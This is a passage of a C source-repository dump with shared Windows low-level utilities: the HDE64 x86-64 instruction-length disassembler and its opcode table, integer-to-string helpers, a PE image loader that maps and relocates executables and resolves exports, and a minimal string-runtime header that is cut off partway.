if (m_mod == 3) {
ht = hde64_table + DELTA_FPU_MODRM + t*8;
t = ht[m_reg] << m_rm;
} else {
ht = hde64_table + DELTA_FPU_REG;
t = ht[t] << m_reg;
}
if (t & 0x80)
hs->flags |= F_ERROR | F_ERROR_OPCODE;
}
if (pref & PRE_LOCK) {
if (m_mod == 3) {
hs->flags |= F_ERROR | F_ERROR_LOCK;
} else {
uint8_t *table_end, op = opcode;
if (hs->opcode2) {
ht = hde64_table + DELTA_OP2_LOCK_OK;
table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; //-V594
} else {
ht = hde64_table + DELTA_OP_LOCK_OK;
table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; //-V594
op &= -2;
}
for (; ht != table_end; ht++)
if (*ht++ == op) {
if (!((*ht << m_reg) & 0x80))
goto no_lock_error;
else
break;
}
hs->flags |= F_ERROR | F_ERROR_LOCK;
no_lock_error:
;
}
}
if (hs->opcode2) {
switch (opcode) {
case 0x20: case 0x22:
m_mod = 3;
if (m_reg > 4 || m_reg == 1)
goto error_operand;
else
goto no_error_operand;
case 0x21: case 0x23:
m_mod = 3;
if (m_reg == 4 || m_reg == 5)
goto error_operand;
else
goto no_error_operand;
}
} else {
switch (opcode) {
case 0x8c:
if (m_reg > 5)
goto error_operand;
else
goto no_error_operand;
case 0x8e:
if (m_reg == 1 || m_reg > 5)
goto error_operand;
else
goto no_error_operand;
}
}
if (m_mod == 3) {
uint8_t *table_end;
if (hs->opcode2) {
ht = hde64_table + DELTA_OP2_ONLY_MEM;
table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; //-V594
} else {
ht = hde64_table + DELTA_OP_ONLY_MEM;
table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; //-V594
}
for (; ht != table_end; ht += 2)
if (*ht++ == opcode) {
if (*ht++ & pref && !((*ht << m_reg) & 0x80))
goto error_operand;
else
break;
}
goto no_error_operand;
} else if (hs->opcode2) {
switch (opcode) {
case 0x50: case 0xd7: case 0xf7:
if (pref & (PRE_NONE | PRE_66))
goto error_operand;
break;
case 0xd6:
if (pref & (PRE_F2 | PRE_F3))
goto error_operand;
break;
case 0xc5:
goto error_operand;
}
goto no_error_operand;
} else
goto no_error_operand;
error_operand:
hs->flags |= F_ERROR | F_ERROR_OPERAND;
no_error_operand:
c = *p++;
if (m_reg <= 1) {
if (opcode == 0xf6)
cflags |= C_IMM8;
else if (opcode == 0xf7)
cflags |= C_IMM_P66;
}
switch (m_mod) {
case 0:
if (pref & PRE_67) {
if (m_rm == 6)
disp_size = 2;
} else
if (m_rm == 5)
disp_size = 4;
break;
case 1:
disp_size = 1;
break;
case 2:
disp_size = 2;
if (!(pref & PRE_67))
disp_size <<= 1;
}
if (m_mod != 3 && m_rm == 4) {
hs->flags |= F_SIB;
p++;
hs->sib = c;
hs->sib_scale = c >> 6;
hs->sib_index = (c & 0x3f) >> 3;
if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1))
disp_size = 4;
}
p--;
switch (disp_size) {
case 1:
hs->flags |= F_DISP8;
hs->disp.disp8 = *p;
break;
case 2:
hs->flags |= F_DISP16;
hs->disp.disp16 = *(uint16_t *)p;
break;
case 4:
hs->flags |= F_DISP32;
hs->disp.disp32 = *(uint32_t *)p;
}
p += disp_size;
} else if (pref & PRE_LOCK)
hs->flags |= F_ERROR | F_ERROR_LOCK;
if (cflags & C_IMM_P66) {
if (cflags & C_REL32) {
if (pref & PRE_66) {
hs->flags |= F_IMM16 | F_RELATIVE;
hs->imm.imm16 = *(uint16_t *)p;
p += 2;
goto disasm_done;
}
goto rel32_ok;
}
if (op64) {
hs->flags |= F_IMM64;
hs->imm.imm64 = *(uint64_t *)p;
p += 8;
} else if (!(pref & PRE_66)) {
hs->flags |= F_IMM32;
hs->imm.imm32 = *(uint32_t *)p;
p += 4;
} else
goto imm16_ok;
}
if (cflags & C_IMM16) {
imm16_ok:
hs->flags |= F_IMM16;
hs->imm.imm16 = *(uint16_t *)p;
p += 2;
}
if (cflags & C_IMM8) {
hs->flags |= F_IMM8;
hs->imm.imm8 = *p++;
}
if (cflags & C_REL32) {
rel32_ok:
hs->flags |= F_IMM32 | F_RELATIVE;
hs->imm.imm32 = *(uint32_t *)p;
p += 4;
} else if (cflags & C_REL8) {
hs->flags |= F_IMM8 | F_RELATIVE;
hs->imm.imm8 = *p++;
}
disasm_done:
if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {
hs->flags |= F_ERROR | F_ERROR_LENGTH;
hs->len = 15;
}
return (unsigned int)hs->len;
}
#pragma warning(pop)
================================================
FILE: Source/Shared/hde/hde64.h
================================================
/*
* Hacker Disassembler Engine 64
* Copyright (c) 2008-2009, Vyacheslav Patkov.
* All rights reserved.
*
* hde64.h: C/C++ header file
*
*/
#ifndef _HDE64_H_
#define _HDE64_H_
/* stdint.h - C99 standard header
* http://en.wikipedia.org/wiki/stdint.h
*
* if your compiler doesn't contain "stdint.h" header (for
* example, Microsoft Visual C++), you can download file:
* http://www.azillionmonkeys.com/qed/pstdint.h
* and change next line to:
* #include "pstdint.h"
*/
#include "pstdint.h"
#define F_MODRM 0x00000001
#define F_SIB 0x00000002
#define F_IMM8 0x00000004
#define F_IMM16 0x00000008
#define F_IMM32 0x00000010
#define F_IMM64 0x00000020
#define F_DISP8 0x00000040
#define F_DISP16 0x00000080
#define F_DISP32 0x00000100
#define F_RELATIVE 0x00000200
#define F_ERROR 0x00001000
#define F_ERROR_OPCODE 0x00002000
#define F_ERROR_LENGTH 0x00004000
#define F_ERROR_LOCK 0x00008000
#define F_ERROR_OPERAND 0x00010000
#define F_PREFIX_REPNZ 0x01000000
#define F_PREFIX_REPX 0x02000000
#define F_PREFIX_REP 0x03000000
#define F_PREFIX_66 0x04000000
#define F_PREFIX_67 0x08000000
#define F_PREFIX_LOCK 0x10000000
#define F_PREFIX_SEG 0x20000000
#define F_PREFIX_REX 0x40000000
#define F_PREFIX_ANY 0x7f000000
#define PREFIX_SEGMENT_CS 0x2e
#define PREFIX_SEGMENT_SS 0x36
#define PREFIX_SEGMENT_DS 0x3e
#define PREFIX_SEGMENT_ES 0x26
#define PREFIX_SEGMENT_FS 0x64
#define PREFIX_SEGMENT_GS 0x65
#define PREFIX_LOCK 0xf0
#define PREFIX_REPNZ 0xf2
#define PREFIX_REPX 0xf3
#define PREFIX_OPERAND_SIZE 0x66
#define PREFIX_ADDRESS_SIZE 0x67
#pragma pack(push,1)
typedef struct {
uint8_t len;
uint8_t p_rep;
uint8_t p_lock;
uint8_t p_seg;
uint8_t p_66;
uint8_t p_67;
uint8_t rex;
uint8_t rex_w;
uint8_t rex_r;
uint8_t rex_x;
uint8_t rex_b;
uint8_t opcode;
uint8_t opcode2;
uint8_t modrm;
uint8_t modrm_mod;
uint8_t modrm_reg;
uint8_t modrm_rm;
uint8_t sib;
uint8_t sib_scale;
uint8_t sib_index;
uint8_t sib_base;
union {
uint8_t imm8;
uint16_t imm16;
uint32_t imm32;
uint64_t imm64;
} imm;
union {
uint8_t disp8;
uint16_t disp16;
uint32_t disp32;
} disp;
uint32_t flags;
} hde64s;
#pragma pack(pop)
#ifdef __cplusplus
extern "C" {
#endif
/* __cdecl */
unsigned int hde64_disasm(const void *code, hde64s *hs);
#ifdef __cplusplus
}
#endif
#endif /* _HDE64_H_ */
================================================
FILE: Source/Shared/hde/pstdint.h
================================================
/*
* MinHook - The Minimalistic API Hooking Library for x64/x86
* Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#pragma once
#include
// Integer types for HDE.
typedef INT8 int8_t;
typedef INT16 int16_t;
typedef INT32 int32_t;
typedef INT64 int64_t;
typedef UINT8 uint8_t;
typedef UINT16 uint16_t;
typedef UINT32 uint32_t;
typedef UINT64 uint64_t;
================================================
FILE: Source/Shared/hde/table64.h
================================================
/*
* Hacker Disassembler Engine 64 C
* Copyright (c) 2008-2009, Vyacheslav Patkov.
* All rights reserved.
*
*/
#define C_NONE 0x00
#define C_MODRM 0x01
#define C_IMM8 0x02
#define C_IMM16 0x04
#define C_IMM_P66 0x10
#define C_REL8 0x20
#define C_REL32 0x40
#define C_GROUP 0x80
#define C_ERROR 0xff
#define PRE_ANY 0x00
#define PRE_NONE 0x01
#define PRE_F2 0x02
#define PRE_F3 0x04
#define PRE_66 0x08
#define PRE_67 0x10
#define PRE_LOCK 0x20
#define PRE_SEG 0x40
#define PRE_ALL 0xff
#define DELTA_OPCODES 0x4a
#define DELTA_FPU_REG 0xfd
#define DELTA_FPU_MODRM 0x104
#define DELTA_PREFIXES 0x13c
#define DELTA_OP_LOCK_OK 0x1ae
#define DELTA_OP2_LOCK_OK 0x1c6
#define DELTA_OP_ONLY_MEM 0x1d8
#define DELTA_OP2_ONLY_MEM 0x1e7
unsigned char hde64_table[] = {
0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5,
0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1,
0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea,
0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0,
0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab,
0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92,
0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90,
0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b,
0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,
0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc,
0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20,
0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff,
0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00,
0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01,
0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10,
0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00,
0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00,
0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,
0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,
0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40,
0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43,
0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,
0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40,
0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06,
0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07,
0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04,
0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10,
0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00,
0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb,
0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff,
0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09,
0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff,
0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08,
0x00,0xf0,0x02,0x00
};
================================================
FILE: Source/Shared/itostr.c
================================================
#include "rtltypes.h"
size_t itostr_a(int x, char *s)
{
int t;
size_t i, r = 1, sign;
t = x;
if (x < 0) {
sign = 1;
while (t <= -10) {
t /= 10;
r++;
}
}
else {
sign = 0;
while (t >= 10) {
t /= 10;
r++;
}
}
if (s == 0)
return r + sign;
if (sign) {
*s = '-';
s++;
}
for (i = r; i != 0; i--) {
s[i - 1] = (char)byteabs(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r + sign;
}
size_t itostr_w(int x, wchar_t *s)
{
int t;
size_t i, r = 1, sign;
t = x;
if (x < 0) {
sign = 1;
while (t <= -10) {
t /= 10;
r++;
}
}
else {
sign = 0;
while (t >= 10) {
t /= 10;
r++;
}
}
if (s == 0)
return r + sign;
if (sign) {
*s = '-';
s++;
}
for (i = r; i != 0; i--) {
s[i - 1] = (wchar_t)byteabs(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r + sign;
}
================================================
FILE: Source/Shared/ldr.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2025
*
* TITLE: LDR.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
DWORD align_gt(
DWORD p,
DWORD align
)
{
DWORD remainder;
if (align == 0) return p;
remainder = p % align;
if (remainder == 0) return p;
if (p > MAXDWORD - (align - remainder)) return p;
return p + (align - remainder);
}
DWORD align_le(
DWORD p,
DWORD align
)
{
if ((p % align) == 0)
return p;
return p - (p % align);
}
LPVOID PELoaderLoadImage(
_In_ LPVOID Buffer,
_Out_opt_ PDWORD SizeOfImage
)
{
DWORD c, p, rsz;
DWORD optHeaderSize = 0, headersSize = 0;
DWORD_PTR delta;
LPWORD chains;
LPVOID exeBuffer = NULL;
PIMAGE_DOS_HEADER dosh;
PIMAGE_FILE_HEADER fileh;
PIMAGE_OPTIONAL_HEADER popth;
PIMAGE_SECTION_HEADER sections;
PIMAGE_BASE_RELOCATION rel;
PIMAGE_NT_HEADERS nth = NULL;
do {
if (Buffer == NULL) {
SetLastError(ERROR_INVALID_PARAMETER);
break;
}
// check image headers
// we are supposed to deal with valid or system bins usually so these checks are slightly redurant
dosh = (PIMAGE_DOS_HEADER)Buffer;
if (dosh->e_magic != IMAGE_DOS_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
break;
}
if (dosh->e_lfanew < sizeof(IMAGE_DOS_HEADER) || dosh->e_lfanew > 0xFFFFF) {
SetLastError(ERROR_INVALID_EXE_SIGNATURE);
break;
}
nth = (PIMAGE_NT_HEADERS)((PBYTE)Buffer + dosh->e_lfanew);
if (nth->Signature != IMAGE_NT_SIGNATURE) {
SetLastError(ERROR_INVALID_EXE_SIGNATURE);
break;
}
fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
optHeaderSize = fileh->SizeOfOptionalHeader;
if (optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER32) &&
optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER64)) {
SetLastError(ERROR_BAD_EXE_FORMAT);
break;
}
popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
if (popth->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC &&
popth->Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
SetLastError(ERROR_EXE_MARKED_INVALID);
break;
}
if (SizeOfImage) *SizeOfImage = popth->SizeOfImage;
// render image
headersSize = align_gt(popth->SizeOfHeaders, popth->FileAlignment);
if (headersSize > popth->SizeOfImage) {
SetLastError(ERROR_BAD_EXE_FORMAT);
break;
}
exeBuffer = VirtualAlloc(NULL, popth->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (exeBuffer == NULL) {
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
break;
}
memcpy(exeBuffer, Buffer, min(headersSize, popth->SizeOfHeaders));
sections = (PIMAGE_SECTION_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER) + fileh->SizeOfOptionalHeader);
for (c = 0; c < fileh->NumberOfSections; c++) {
if ((sections[c].SizeOfRawData > 0) && (sections[c].PointerToRawData > 0)) {
memcpy((PBYTE)exeBuffer + sections[c].VirtualAddress,
(PBYTE)Buffer + align_le(sections[c].PointerToRawData, popth->FileAlignment),
align_gt(sections[c].SizeOfRawData, popth->FileAlignment));
}
}
// reloc image
dosh = (PIMAGE_DOS_HEADER)exeBuffer;
fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)exeBuffer + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exeBuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
return exeBuffer;
} while (FALSE);
return NULL;
}
LPVOID PELoaderGetProcAddress(
_In_ LPVOID ImageBase,
_In_ PCHAR RoutineName
)
{
USHORT OrdinalIndex;
LONG Result;
PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
PULONG NameTableBase, FunctionTableBase;
PUSHORT NameOrdinalTableBase;
PCHAR CurrentName;
ULONG High, Low, Middle = 0;
ULONG ExportDirRVA, ExportDirSize;
ULONG FunctionRVA;
union {
PIMAGE_NT_HEADERS64 nt64;
PIMAGE_NT_HEADERS32 nt32;
PIMAGE_NT_HEADERS nt;
} NtHeaders;
if (ImageBase == NULL || RoutineName == NULL) {
SetLastError(ERROR_INVALID_PARAMETER);
return NULL;
}
NtHeaders.nt = RtlImageNtHeader(ImageBase);
if (NtHeaders.nt == NULL) {
SetLastError(ERROR_INVALID_PARAMETER);
return NULL;
}
if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) {
ExportDirRVA = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
ExportDirSize = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
}
else if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) {
ExportDirRVA = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
ExportDirSize = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
}
else {
SetLastError(ERROR_EXE_MACHINE_TYPE_MISMATCH);
return NULL;
}
if (ExportDirRVA == 0 || ExportDirSize == 0) {
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer((ULONG_PTR)ImageBase, ExportDirRVA);
NameTableBase = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNames);
NameOrdinalTableBase = (PUSHORT)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNameOrdinals);
FunctionTableBase = (PULONG)((ULONG_PTR)ImageBase + ExportDirectory->AddressOfFunctions);
if (ExportDirectory->NumberOfNames == 0) {
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
Low = 0;
High = ExportDirectory->NumberOfNames - 1;
while (Low <= High) {
Middle = Low + (High - Low) / 2;
CurrentName = (PCHAR)RtlOffsetToPointer((ULONG_PTR)ImageBase, NameTableBase[Middle]);
Result = _strcmp_a(RoutineName, CurrentName);
if (Result == 0) {
OrdinalIndex = NameOrdinalTableBase[Middle];
if (OrdinalIndex >= ExportDirectory->NumberOfFunctions) {
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
FunctionRVA = FunctionTableBase[OrdinalIndex];
if (FunctionRVA == 0) {
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
return (LPVOID)RtlOffsetToPointer((ULONG_PTR)ImageBase, FunctionRVA);
}
if (Result < 0) {
if (Middle == 0) break;
High = Middle - 1;
}
else {
Low = Middle + 1;
}
}
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
================================================
FILE: Source/Shared/ldr.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: LDR.H
*
* VERSION: 2.72
*
* DATE: 26 May 2017
*
* Common header file for PE loader unit.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
LPVOID PELoaderLoadImage(
_In_ LPVOID Buffer,
_Out_opt_ PDWORD SizeOfImage);
LPVOID PELoaderGetProcAddress(
_In_ LPVOID ImageBase,
_In_ PCHAR RoutineName);
================================================
FILE: Source/Shared/libinc.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018
*
* TITLE: LIBINC.H
*
* VERSION: 1.0.02
*
* DATE: 18 Nov 2018
*
* Master header file for C Runtime libraries include.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#if defined (_MSC_VER)
#if (_MSC_VER >= 1900) //VS15, 17 etc
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
#endif
================================================
FILE: Source/Shared/minirtl.h
================================================
/*
Module name:
minirtl.h
Description:
header for string handling and conversion routines
Date:
4 Oct 2020
*/
#pragma once
#ifndef _MINIRTL_
#define _MINIRTL_
// string copy/concat/length
char *_strend_a(const char *s);
wchar_t *_strend_w(const wchar_t *s);
char *_strcpy_a(char *dest, const char *src);
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
char *_strcat_a(char *dest, const char *src);
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
char *_strcpyn_a(char* dest, const char* src, size_t n);
wchar_t *_strcpyn_w(wchar_t* dest, const wchar_t* src, size_t n);
size_t _strlen_a(const char *s);
size_t _strlen_w(const wchar_t *s);
// comparing
int _strcmp_a(const char *s1, const char *s2);
int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
int _strncmp_a(const char *s1, const char *s2, size_t cchars);
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
int _strcmpi_a(const char *s1, const char *s2);
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
char *_strstr_a(const char *s, const char *sub_s);
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
char *_strstri_a(const char *s, const char *sub_s);
wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
char *_strchr_a(const char *s, const char ch);
wchar_t *_strchr_w(const wchar_t *s, const wchar_t ch);
// conversion of integer types to string, returning string length
size_t ultostr_a(unsigned long x, char *s);
size_t ultostr_w(unsigned long x, wchar_t *s);
size_t ultohex_a(unsigned long x, char *s);
size_t ultohex_w(unsigned long x, wchar_t *s);
size_t itostr_a(int x, char *s);
size_t itostr_w(int x, wchar_t *s);
size_t i64tostr_a(signed long long x, char *s);
size_t i64tostr_w(signed long long x, wchar_t *s);
size_t u64tostr_a(unsigned long long x, char *s);
size_t u64tostr_w(unsigned long long x, wchar_t *s);
size_t u64tohex_a(unsigned long long x, char *s);
size_t u64tohex_w(unsigned long long x, wchar_t *s);
// string to integers conversion
unsigned long strtoul_a(char *s);
unsigned long strtoul_w(wchar_t *s);
unsigned long long strtou64_a(char *s);
unsigned long long strtou64_w(wchar_t *s);
unsigned long hextoul_a(char *s);
unsigned long hextoul_w(wchar_t *s);
int strtoi_a(char *s);
int strtoi_w(wchar_t *s);
signed long long strtoi64_a(char *s);
signed long long strtoi64_w(wchar_t *s);
unsigned long long hextou64_a(char *s);
unsigned long long hextou64_w(wchar_t *s);
/* =================================== */
#ifdef UNICODE
#define _strend _strend_w
#define _strcpy _strcpy_w
#define _strcat _strcat_w
#define _strlen _strlen_w
#define _strncpy _strncpy_w
#define _strcpyn _strcpyn_w
#define _strcmp _strcmp_w
#define _strncmp _strncmp_w
#define _strcmpi _strcmpi_w
#define _strncmpi _strncmpi_w
#define _strstr _strstr_w
#define _strstri _strstri_w
#define _strchr _strchr_w
#define ultostr ultostr_w
#define ultohex ultohex_w
#define itostr itostr_w
#define i64tostr i64tostr_w
#define u64tostr u64tostr_w
#define u64tohex u64tohex_w
#define _strtoul strtoul_w
#define hextoul hextoul_w
#define strtoi strtoi_w
#define strtoi64 strtoi64_w
#define strtou64 strtou64_w
#define hextou64 hextou64_w
#else // ANSI
#define _strend _strend_a
#define _strcpy _strcpy_a
#define _strcat _strcat_a
#define _strlen _strlen_a
#define _strncpy _strncpy_a
#define _strcpyn _strcpyn_a
